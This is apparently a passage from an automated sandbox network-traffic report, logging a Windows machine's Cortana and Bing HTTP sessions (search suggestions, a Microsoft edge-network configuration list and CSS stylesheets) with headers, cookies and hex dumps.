                                                                                                              X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75
                                                                                                              X-Device-ClientSession: 03BBCBA1937A4CF7B4AD5C321610FE95
                                                                                                              X-Device-isOptin: false
                                                                                                              X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                              X-Device-OSSKU: 48
                                                                                                              X-Device-Touch: false
                                                                                                              X-DeviceID: 01000A4109009A83
                                                                                                              X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2
                                                                                                              X-MSEdge-ExternalExpType: JointCoord
                                                                                                              X-PositionerType: Desktop
                                                                                                              X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                              X-Search-CortanaAvailableCapabilities: None
                                                                                                              X-Search-SafeSearch: Moderate
                                                                                                              X-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Time
                                                                                                              X-UserAgeClass: Unknown
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: www.bing.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1729887743&IPMH=35531570&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                                                                                                              2024-10-25 20:22:25 UTC1190INHTTP/1.1 200 OK
                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Content-Length: 6725
                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                              Expires: -1
                                                                                                              P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
                                                                                                              Set-Cookie: _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; domain=.bing.com; path=/; HttpOnly
                                                                                                              Set-Cookie: MUIDB=5047E5942BB2460EA35B53CCF78DDB3D; expires=Wed, 19-Nov-2025 20:22:25 GMT; path=/; HttpOnly
                                                                                                              X-EventID: 671bfe01232a46ab84b7af776e87ae6f
                                                                                                              UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              X-MSEdge-Ref: Ref A: 0118EDFE445D453EA4B612C3E5F8FF39 Ref B: DFW311000105039 Ref C: 2024-10-25T20:22:25Z
                                                                                                              Date: Fri, 25 Oct 2024 20:22:25 GMT
                                                                                                              Connection: close
                                                                                                              2024-10-25 20:22:25 UTC1897INData Raw: 7b 22 52 65 73 6f 75 72 63 65 73 22 3a 7b 22 53 74 79 6c 65 73 22 3a 7b 22 43 73 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 43 73 73 48 65 61 64 4f 76 65 72 72 69 64 65 22 3a 7b 7d 7d 2c 22 53 63 72 69 70 74 73 22 3a 7b 22 4a 73 48 65 61 64 54 6f 70 6d 6f 73 74 22 3a 7b 7d 2c 22 4a 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 4a 73 45 6e 64 4f 66 43 68 75 6e 6b 22 3a 7b 7d 2c 22 4a 73 42 65 66 6f 72 65 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 4f 6e 4c 6f 61 64 22 3a 7b 7d 7d 7d 2c 22 53 75 67 67 65 73 74 69 6f 6e 73 22 3a 5b 7b 22 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 75 72 6c 22 3a 22 2f 73 65 61 72 63 68 3f 71 3d 6e 6f 72 64 76 70 6e 5c 75 30 30 32 36 66 69
                                                                                                              Data Ascii: {"Resources":{"Styles":{"CssHeadNormal":{},"CssHeadOverride":{}},"Scripts":{"JsHeadTopmost":{},"JsHeadNormal":{},"JsEndOfChunk":{},"JsBeforeContent":{},"JsAfterContent":{},"JsAfterOnLoad":{}}},"Suggestions":[{"Attributes":{"url":"/search?q=nordvpn\u0026fi
                                                                                                              2024-10-25 20:22:25 UTC1232INData Raw: 41 53 22 2c 22 71 75 65 72 79 22 3a 22 6e 6f 74 69 6f 6e 22 2c 22 73 74 79 70 65 22 3a 22 4d 42 22 2c 22 68 63 22 3a 22 31 22 2c 22 68 63 73 22 3a 22 30 22 2c 22 69 73 41 6e 73 77 65 72 22 3a 22 31 22 2c 22 61 73 62 74 79 70 65 22 3a 22 41 53 22 2c 22 61 64 64 69 74 69 6f 6e 61 6c 49 6e 66 6f 54 65 78 74 22 3a 22 4b 6f 6d 6d 65 72 7a 69 65 6c 6c 65 72 20 4f 6e 6c 69 6e 65 64 69 65 6e 73 74 22 2c 22 73 65 63 6f 6e 64 61 72 79 49 63 6f 6e 55 72 6c 22 3a 22 2f 74 68 3f 69 64 3d 4f 53 4b 2e 4d 74 5a 50 5f 78 49 35 69 4c 4d 6d 46 61 63 52 42 6f 48 79 47 41 43 75 49 4c 2d 6a 6b 38 48 72 59 79 38 46 33 64 41 46 38 61 67 5c 75 30 30 32 36 77 3d 38 30 5c 75 30 30 32 36 68 3d 38 30 5c 75 30 30 32 36 71 6c 74 3d 39 30 5c 75 30 30 32 36 63 3d 36 5c 75 30 30 32 36 72
                                                                                                              Data Ascii: AS","query":"notion","stype":"MB","hc":"1","hcs":"0","isAnswer":"1","asbtype":"AS","additionalInfoText":"Kommerzieller Onlinedienst","secondaryIconUrl":"/th?id=OSK.MtZP_xI5iLMmFacRBoHyGACuIL-jk8HrYy8F3dAF8ag\u0026w=80\u0026h=80\u0026qlt=90\u0026c=6\u0026r
                                                                                                              2024-10-25 20:22:25 UTC3596INData Raw: 32 36 72 73 3d 31 5c 75 30 30 32 36 63 64 76 3d 31 5c 75 30 30 32 36 70 69 64 3d 52 53 22 2c 22 73 65 67 6d 65 6e 74 73 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 7d 2c 22 54 65 78 74 22 3a 22 4e 6f 74 69 6e 6f 22 2c 22 48 69 67 68 43 6f 6e 66 69 64 65 6e 63 65 4d 65 74 61 53 75 67 67 65 73 74 69 6f 6e 53 63 6f 72 65 22 3a 30 2c 22 50 72 65 66 65 74 63 68 43 6f 6e 66 69 64 65 6e 63 65 53 63 6f 72 65 22 3a 30 7d 2c 7b 22 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 75 72 6c 22 3a 22 2f 73 65 61 72 63 68 3f 71 3d 6e 6f 72 74 6f 6e 22 2c 22 71 75 65 72 79 22 3a 22 6e 6f 72 74 6f 6e 22 2c 22 73 74 79 70 65 22 3a 22 41 53 22 2c 22 6c 6d 22 3a 22 31 30 30 30 3a 5c 22 30 5c 22 3b 32 32 30 30 3a 5c 22 31 33 5c 22 3b 33 30 30 30 31 3a 5c 22 31 32 37 35 35 5c 22
                                                                                                              Data Ascii: 26rs=1\u0026cdv=1\u0026pid=RS","segments":"Organization"},"Text":"Notino","HighConfidenceMetaSuggestionScore":0,"PrefetchConfidenceScore":0},{"Attributes":{"url":"/search?q=norton","query":"norton","stype":"AS","lm":"1000:\"0\";2200:\"13\";30001:\"12755\"


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              16192.168.2.1649717204.79.197.222443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:22:25 UTC462OUTGET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1
                                                                                                              Origin: https://www.bing.com
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept: */*
                                                                                                              Accept-Language: en-CH
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: fp.msedge.net
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-10-25 20:22:25 UTC430INHTTP/1.1 200 OK
                                                                                                              Cache-Control: public,max-age=900
                                                                                                              Content-Length: 20076
                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                              ETag: "790020110"
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Request-Context: appId=cid-v1:b183296d-485b-49fc-81c7-a511e61d1309
                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                              X-MSEdge-Ref: Ref A: 9A6C52D39DBF45718C36021D6103FB8C Ref B: DFW311000105011 Ref C: 2024-10-25T20:22:25Z
                                                                                                              Date: Fri, 25 Oct 2024 20:22:25 GMT
                                                                                                              Connection: close
                                                                                                              2024-10-25 20:22:25 UTC1065INData Raw: 7b 22 73 22 3a 35 30 30 30 2c 22 6e 22 3a 33 2c 22 65 22 3a 5b 7b 22 65 22 3a 22 2a 2e 61 7a 72 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 35 30 30 30 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 2a 2e 63 6c 6f 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 32 30 30 30 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22 3a 22 2a 2e 63 6c 6f 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 31 30 30 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 2a 2e 6e 72 62 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 34 32 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 61 66 64 78 74 65 73 74 2e 7a 30 31 2e 61 7a 75 72 65 66 64 2e 6e 65 74 22 2c 22 77 22 3a 35 30 30 2c 22 6d 22 3a 31 7d 2c 7b
                                                                                                              Data Ascii: {"s":5000,"n":3,"e":[{"e":"*.azr.footprintdns.com","w":5000,"m":128},{"e":"*.clo.footprintdns.com","w":2000,"m":1},{"e":"*.clo.footprintdns.com","w":100,"m":128},{"e":"*.nrb.footprintdns.com","w":420,"m":3},{"e":"afdxtest.z01.azurefd.net","w":500,"m":1},{
                                                                                                              2024-10-25 20:22:25 UTC2734INData Raw: 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 61 78 2d 72 69 6e 67 2d 66 61 6c 6c 62 61 63 6b 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 35 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 62 64 33 61 7a 66 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 75 73 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 62 64 33 61 7a 66 61 70 70 30 32 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 75 73 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 62 64 38 61 7a 66 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 75 73 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 62 64 38 61 7a 66 61 70 70 30 32 2d 63 61 6e 61 72
                                                                                                              Data Ascii: m":3},{"e":"ax-ring-fallback.msedge.net","w":50,"m":3},{"e":"bd3azfapp01-canary.netmon.azure.us","w":3,"m":128},{"e":"bd3azfapp02-canary.netmon.azure.us","w":3,"m":128},{"e":"bd8azfapp01-canary-opaph.netmon.azure.us","w":3,"m":128},{"e":"bd8azfapp02-canar
                                                                                                              2024-10-25 20:22:25 UTC4096INData Raw: 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 63 71 31 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 63 2d 72 69 6e 67 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 32 30 30 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 63 2d 72 69 6e 67 2d 66 61 6c 6c 62 61 63 6b 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 35 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 63 76 6c 30 32 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22
                                                                                                              Data Ascii: -opaph.netmon.azure.com","w":3,"m":128},{"e":"cq1prdapp01-canary.netmon.azure.com","w":3,"m":128},{"e":"c-ring.msedge.net","w":2000,"m":3},{"e":"c-ring-fallback.msedge.net","w":50,"m":3},{"e":"cvl02prdapp01-canary-opaph.netmon.azure.com","w":3,"m":1},{"e"
                                                                                                              2024-10-25 20:22:25 UTC4096INData Raw: 22 66 72 61 32 32 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 66 72 61 32 33 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 66 72 61 32 33 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 67 72 61 70 68 2e 61 7a 75 72 65 66 64 2e 6e 65 74 22 2c 22 77 22 3a 31 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22 3a 22 67 72 61 70 68 2e 61 7a 75 72 65 66 64 2e 6e 65 74 22
                                                                                                              Data Ascii: "fra22prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"fra23prdapp01-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"fra23prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"graph.azurefd.net","w":1,"m":1},{"e":"graph.azurefd.net"
                                                                                                              2024-10-25 20:22:25 UTC4096INData Raw: 32 30 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22 3a 22 6e 61 67 32 30 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22 3a 22 6e 61 67 32 30 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 6e 61 67 32 30 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22
                                                                                                              Data Ascii: 20prdapp01-canary-opaph.netmon.azure.com","w":3,"m":1},{"e":"nag20prdapp01-canary-opaph.netmon.azure.com","w":3,"m":1},{"e":"nag20prdapp01-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"nag20prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e"
                                                                                                              2024-10-25 20:22:25 UTC3989INData Raw: 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 73 6a 63 32 32 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 73 6e 34 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 73 6e 35 61 7a 66 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 75 73 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 73 6e 35 61 7a 66 61 70 70 30 32 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 75 73 22 2c 22 77 22 3a 33
                                                                                                              Data Ascii: netmon.azure.com","w":3,"m":128},{"e":"sjc22prdapp02-canary.netmon.azure.com","w":3,"m":128},{"e":"sn4prdapp01-canary.netmon.azure.com","w":3,"m":128},{"e":"sn5azfapp01-canary.netmon.azure.us","w":3,"m":128},{"e":"sn5azfapp02-canary.netmon.azure.us","w":3


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              17192.168.2.164972223.1.33.206443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:22:25 UTC801OUTGET /rb/1a/cir3,ortl,cc,nc/f4st08wpuYBQ5KWRJ3MqAsJB8zg.css?bu=C8wJpQO8BKgKjQn3CP0GXV1dXQ&or=w HTTP/1.1
                                                                                                              Accept: */*
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: r.bing.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1729887743&IPMH=35531570&IPMID=1707317782133
                                                                                                              2024-10-25 20:22:25 UTC1211INHTTP/1.1 200 OK
                                                                                                              Content-Type: text/css; charset=utf-8
                                                                                                              Server: Kestrel
                                                                                                              Access-Control-Allow-Headers: *
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:56:02 GMT
                                                                                                              X-EventID: 671b6c14302d4d9f9c7b24cfbe084150
                                                                                                              UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
                                                                                                              X-AS-InstrumentationOptions: AppServerLoggingMaster=1
                                                                                                              X-AS-MACHINENAME: BNZEEAP00016AA0
                                                                                                              X-AS-SuppressSetCookie: 1
                                                                                                              X-XSS-Protection: 0
                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                              nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
                                                                                                              report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
                                                                                                              Cache-Control: public, max-age=394643
                                                                                                              Expires: Wed, 30 Oct 2024 09:59:48 GMT
                                                                                                              Date: Fri, 25 Oct 2024 20:22:25 GMT
                                                                                                              Content-Length: 20329
                                                                                                              Connection: close
                                                                                                              Alt-Svc: h3=":443"; ma=93600
                                                                                                              Akamai-GRN: 0.95200117.1729887745.412fa03f
                                                                                                              Timing-Allow-Origin: *
                                                                                                              2024-10-25 20:22:25 UTC15173INData Raw: 2e 73 77 5f 70 6c 75 73 2c 2e 73 77 5f 75 70 2c 2e 73 77 5f 64 6f 77 6e 2c 2e 73 77 5f 73 74 2c 2e 73 77 5f 73 74 68 2c 2e 73 77 5f 73 74 65 2c 2e 73 77 5f 74 70 63 62 6b 2c 2e 73 77 5f 70 6c 61 79 2c 2e 73 77 5f 70 6c 61 79 64 2c 2e 73 77 5f 70 6c 61 79 61 2c 2e 73 77 5f 70 6c 61 79 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 53 65 67 6f 65 20 4d 44 4c 32 20 41 73 73 65 74 73 22 7d 2e 73 77 5f 70 6c 75 73 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 ee 9c 90 22 7d 2e 73 77 5f 70 6c 61 79 3a 61 66 74 65 72 2c 2e 73 77 5f 70 6c 61 79 61 3a 61 66 74 65 72 2c 2e 73 77 5f 70 6c 61 79 64 3a 61 66 74 65 72 2c 2e 73 77 5f 70 6c 61 79 70 3a 61 66 74 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 63 6f
                                                                                                              Data Ascii: .sw_plus,.sw_up,.sw_down,.sw_st,.sw_sth,.sw_ste,.sw_tpcbk,.sw_play,.sw_playd,.sw_playa,.sw_playp{font-family:"Segoe MDL2 Assets"}.sw_plus:after{content:""}.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after{font-size:16px;line-height:16px;co
                                                                                                              2024-10-25 20:22:25 UTC5156INData Raw: 61 6c 67 6f 2b 73 63 72 69 70 74 2b 73 63 72 69 70 74 2b 2e 62 5f 61 6e 73 2c 62 6f 64 79 5b 64 69 72 5d 20 23 62 5f 72 65 73 75 6c 74 73 3e 2e 62 5f 6e 61 76 2b 73 63 72 69 70 74 2b 73 63 72 69 70 74 2b 2e 62 5f 61 6c 67 6f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 7d 62 6f 64 79 5b 64 69 72 5d 20 23 62 5f 72 65 73 75 6c 74 73 3e 6c 69 3e 2a 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 62 6f 64 79 5b 64 69 72 5d 20 2e 62 5f 63 61 70 74 69 6f 6e 3e 2a 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 62 6f 64 79 5b 64 69 72 5d 20 2e 76 6c 69 73 74 3e 6c 69 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 62 6f 64 79 5b 64 69 72 5d 20 2e 62 5f 76 50 61 6e 65 6c 3e 6c 69 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 62 6f 64 79 5b 64 69 72 5d 20 2e 6c 66 74 3e 2a 3a 6c 61 73 74 2d 63 68 69 6c 64 7b
                                                                                                              Data Ascii: algo+script+script+.b_ans,body[dir] #b_results>.b_nav+script+script+.b_algo{margin-top:4px}body[dir] #b_results>li>*:last-child,body[dir] .b_caption>*:last-child,body[dir] .vlist>li:last-child,body[dir] .b_vPanel>li:last-child,body[dir] .lft>*:last-child{


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              18192.168.2.164972323.1.33.206443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:22:26 UTC791OUTGET /rb/1a/cir3,ortl,cc,nc/yy4SnZtT2-rfsZpLbcm-u8xyafQ.css?bu=B8YCSLQCmgFdXdEC&or=w HTTP/1.1
                                                                                                              Accept: */*
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: r.bing.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1729887743&IPMH=35531570&IPMID=1707317782133
                                                                                                              2024-10-25 20:22:26 UTC1210INHTTP/1.1 200 OK
                                                                                                              Content-Type: text/css; charset=utf-8
                                                                                                              Server: Kestrel
                                                                                                              Access-Control-Allow-Headers: *
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:57:11 GMT
                                                                                                              X-EventID: 671b6beb31114d7485442a6f2fdee7d9
                                                                                                              UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
                                                                                                              X-AS-InstrumentationOptions: AppServerLoggingMaster=1
                                                                                                              X-AS-MACHINENAME: BNZEEAP00016A2B
                                                                                                              X-AS-SuppressSetCookie: 1
                                                                                                              X-XSS-Protection: 0
                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                              nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
